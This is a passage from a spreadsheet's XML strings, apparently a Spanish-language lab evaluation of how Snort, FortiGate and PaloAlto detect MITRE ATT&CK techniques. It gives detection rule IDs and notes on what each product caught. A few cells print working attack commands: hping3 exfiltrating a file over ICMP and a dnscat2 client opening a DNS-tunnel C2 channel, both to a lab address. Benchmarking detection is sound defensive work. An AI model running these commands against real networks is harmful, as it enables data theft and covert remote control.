        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2015016,</t>
    </r>
  </si>
  <si>
    <t>2003303, 2003410</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no identifica un flujo ICMP (no afecta a los resultados)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados FG:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> la diferencia de flujos se debe a la presencia de retransmisiones. No afecta a los resultados</t>
    </r>
  </si>
  <si>
    <t>Exfiltración por ICMP</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-Exfiltration_over_ICMP_[2].pcapng </t>
  </si>
  <si>
    <t>ICMP</t>
  </si>
  <si>
    <t>Regla genérica que detecte PING inusual.</t>
  </si>
  <si>
    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
  </si>
  <si>
    <t>Manual [2] /  3.2.2.1</t>
  </si>
  <si>
    <t>Manual [4] / B.27</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.2.2</t>
  </si>
  <si>
    <t>El uso de ICMP para enviar datos se corresponde con un ataque</t>
  </si>
  <si>
    <t>29456, 384, 408</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <t>31767, 29456, 384, 408</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31767, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31767, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2002749, 2100408, 29456, 384, 408, 31767</t>
  </si>
  <si>
    <t>2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408, 31767</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100384, 2002752, 2002749, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 384, 408, 31767</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100384, 2002752, 2002749, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no identifica el flujo ICMP pero sí lo analiza (genera alertas relacionadas)</t>
    </r>
  </si>
  <si>
    <t>Ping - Has Known Vulnerability</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Execution, Privilege Escalation</t>
  </si>
  <si>
    <t>TA0003</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>At</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>Ejecución de tarea mediante uso de comando at para programar la hora de la ejecución</t>
  </si>
  <si>
    <t>Caldera, At</t>
  </si>
  <si>
    <t>T1053.002-Scheduled_TaskJob_At_[5].pcapng</t>
  </si>
  <si>
    <t>Establecimiento de sesión con herramienta Sandcat - T1059</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de comando At para programar tareas a una determinada hora o momento</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque consiste en ejecutar una orden en el equipo remoto mediante el uso de At, programando la hora de ejecución de dicha orden. De esta forma, puede obtenerse persistencia, por ejemplo. </t>
  </si>
  <si>
    <t>Manual [5] / 4.3.3</t>
  </si>
  <si>
    <t>Manual [5] / C.42</t>
  </si>
  <si>
    <t>Manual [5] / 5.5.5</t>
  </si>
  <si>
    <t>La programacion de una tarea no necesariamente tiene porque ser un ataque</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 2043217</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 2043217, 50447</t>
  </si>
  <si>
    <t>50447, 2034567, 2013028, 2019240</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2002752, 2002749, 2006409, 2034567, 2013028, 2002824, 2019240, 2011803, 2101200, 2101390, 2043217
</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101390</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2006409, 2034567, 2013028, 2002824, 2019240, 2011803, 2101200, 2043217
</t>
  </si>
  <si>
    <t>2002752, 2002749. 2034567, 2013028, 2019240, 50447, 2002824, 2101200, 2006409, 2101390, 2011803</t>
  </si>
  <si>
    <t>2101390, 2011803</t>
  </si>
  <si>
    <t>2002752, 2002749. 2034567, 2013028, 2019240, 50447, 2002824, 2101200, 2006409</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: el ataque contiene el establecimiento de sesión mediante la herramienta Sandcat, siendo éste detectado por Snort. </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso de la herramienta CALDERA para el establecimiento de la sesión, pero no detecta la programación de la tarea</t>
    </r>
  </si>
  <si>
    <t>9999, 86782</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto detecta el uso de Caldera Sandcat como herramienta C2. Sin embargo, no detecta el ataque en sí. Por tanto, no se consideran los flujos para el calculo de la detección</t>
    </r>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
  </si>
  <si>
    <t>T1070-Indicator_removal_network_share_connection_removal_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
  </si>
  <si>
    <t>Manual [4] /  3.8</t>
  </si>
  <si>
    <t>Manual [4] / B.8</t>
  </si>
  <si>
    <t>Manual [4] / 4.8</t>
  </si>
  <si>
    <t>La eliminación de conexiones establecidas con Network Share de Windows es legítima en ciertos contextos</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Command - Control via DNS</t>
  </si>
  <si>
    <t>dnscat2</t>
  </si>
  <si>
    <t>T1071-Tunel_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecta uso de dnscat</t>
  </si>
  <si>
    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
  </si>
  <si>
    <t>Manual [1] /  5.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.30</t>
  </si>
  <si>
    <t>La ocultación de un canal C&amp;C haciendo uso de un tunel DNS siempre es un ataque</t>
  </si>
  <si>
    <t>54827, 13249</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527, 2013514, 54827, 13249</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527</t>
  </si>
  <si>
    <t>2013514, 54827, 13249</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527, 2013514, 13249</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527, 13249</t>
  </si>
  <si>
    <t>2013514, 54827</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados FG:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> la diferencia entre flujos se debe a la presencia de un flujo htext y un flujo dirigido hacia el puerto 67 (bootps)</t>
    </r>
  </si>
  <si>
    <t>DNS-base - used by malware</t>
  </si>
  <si>
    <t xml:space="preserve">Paloalto detecta el uso de DNSCat como herramienta C2. </t>
  </si>
  <si>
    <t>9</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Descubrimiento de cuentas de dominio en entorno Active Directory</t>
  </si>
  <si>
    <t>Caldera, net</t>
  </si>
  <si>
    <t>T1087.002-AccountDiscovery_DomainAccount_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte uso de comandos para enumerar los usuarios o grupos del dominio como net user /domain o net group /domain</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante CMD para enumerar usuarios y grupos del dominio</t>
  </si>
  <si>
    <t>Manual [5] / 4.6.2</t>
  </si>
  <si>
    <t>Manual [5] / C.44</t>
  </si>
  <si>
    <t>Manual [5] / 5.8.6</t>
  </si>
  <si>
    <t>El descubrimiento de cuentas de un dominio AD puede confundirse con actividades de un administrador de red</t>
  </si>
  <si>
    <t>2018959, 2016538, 2014520, 2043217</t>
  </si>
  <si>
    <t>2018959, 2016538, 2014520</t>
  </si>
  <si>
    <t>2018959, 2016538, 2014520, 2043217, 50447</t>
  </si>
  <si>
    <t>2018959, 2016538, 2014520, 50447</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2006408, 2018959, 2016538, 2014520, 2011803, 2101200, 2101390, 2006409, 2043217</t>
  </si>
  <si>
    <t>50447, 2006408, 2018959, 2016538, 2014520, 2011803, 2101200, 2006409, 2043217</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2006408, 2018959, 2016538, 2014520, 2011803, 2101200, 2101390, 2006409</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque hace uso de Sandcat como herramienta auxiliar para el ataque. Sin embargo, se trata de un ataque colateral que sí es detectado por Snort. El ataque principal, sin embargo, no es detectado</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso del agente Caldera, pero no detecta el descubrimiento de cuentas de dominio en sí</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>: PaloAlto detecta el uso de Caldera Sandcat como herramienta C2. Sin embargo, no detecta el ataque en sí. Por tanto, no se consideran los flujos para el calculo de la detección</t>
    </r>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
  </si>
  <si>
    <t>T1090-Proxy_internal_proxy_[4].pcapng</t>
  </si>
  <si>
    <t>Establecimiento de canal C&amp;C mediante Covenant - Command and Control</t>
  </si>
  <si>
    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
  </si>
  <si>
    <t>Manual [4] /  3.20</t>
  </si>
  <si>
    <t>Manual [4] / B.20</t>
  </si>
  <si>
    <t>Manual [4] / 4.20</t>
  </si>
  <si>
    <t>El uso de un equipo interno como Proxy para comunicaciones C&amp;C siempre es ataque</t>
  </si>
  <si>
    <t>2027794, 2027793, 2027792</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, 2002752, 2002749, 2101620 </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, 2002752, 2002749, 2101620 </t>
    </r>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2101620</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza dos flujos ICMP</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el establecimiento del canal C&amp;C, pero no detecta el uso de un equipo interno como Proxy</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF57BB8A"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">9999,85585, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>54319, 32880, 56396</t>
    </r>
  </si>
  <si>
    <t>85585, 54319, 32880, 56396</t>
  </si>
  <si>
    <t>54319, 32880, 56396</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: PaloAlto detecta el uso de Covenant como herramienta de C2 . Además, detecta los mensajes beacon correspondientes a Covenant . Los flujos no contarán para el calculo de la capacidad de deteccion        </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos detectados PA: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto no detecta los flujos ICMPv6, MDNS y LLMNR</t>
    </r>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Usar un protocolo que no sea de la capa de Aplicacion en el modelo OSI para esconder la conexión de C2. En este caso utilizamos TCP</t>
  </si>
  <si>
    <t>Caldera, manx</t>
  </si>
  <si>
    <t>T1095-Non_Application_Layer_[3].pcapng</t>
  </si>
  <si>
    <t>Agente Caldera para el establecimiento de la sesión - Command and Control</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de comandos o comunicaciones C&amp;C en puertos no comunes o haciendo uso de servicios distintos de capa de aplicación</t>
  </si>
  <si>
    <t>Utilizar la herramienta manx de Caldera para crear sesión C2 mediante TCP</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13.5</t>
  </si>
  <si>
    <t>El uso de un protocolo distinto de capa de aplicación para ataques C&amp;C siempre es un ataque</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 2044770</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 2044770, 50447</t>
  </si>
  <si>
    <t>2034567, 2013028, 2019240, 50447</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2006409, 2034567, 2013028, 2002824, 2019240, 2101200, 2044770</t>
  </si>
  <si>
    <t>50447, 2006409, 2034567, 2013028, 2002824, 2019240, 2101200, 2044770</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2006409, 2034567, 2013028, 2002824, 2019240, 2101200</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso del agente Caldera, por lo que se puede afirmar que es válida la detección del ataque colateral, no así del uso de una capa distinta de aplicación para el establecimiento del canal C&amp;C (naturaleza del ataque)</t>
    </r>
  </si>
  <si>
    <t>86786, 86787</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto detecta el uso de Caldera Manx como herramienta C2 pero no es capaz de detectar el ataque en sí.</t>
    </r>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Subida de información confidencial a Workspace de Google Drive</t>
  </si>
  <si>
    <t>Covenant, Google Drive API</t>
  </si>
  <si>
    <t>T1102.003-Web_service-one_way_communication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
  </si>
  <si>
    <t>Manual [4] /  3.21</t>
  </si>
  <si>
    <t>Manual [4] / B.21</t>
  </si>
  <si>
    <t>Manual [4] / 4.21</t>
  </si>
  <si>
    <t>El uso de un servicio Web para subir datos puede confundirse a menudo con actividades legítimas</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2002752, 2002749, 2100628</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2100628</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2002752, 2002749, 2100628</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749, 2100628</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el establecimiento del canal C&amp;C además del ataque principal, que consiste en el uso de servicios de Google</t>
    </r>
  </si>
  <si>
    <t>Google-base</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el uso de Covenant como herramienta de C2. Además, detecta los mensajes beacon correspondientes a Covenant . Los flujos no contarán para el calculo de la capacidad de deteccion</t>
    </r>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Sesión Remota + Ataque C2</t>
  </si>
  <si>
    <t>RDP, Covenant</t>
  </si>
  <si>
    <t>T1104-Multi_stage_channels_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
  </si>
  <si>
    <t>Manual [4] /  3.22</t>
  </si>
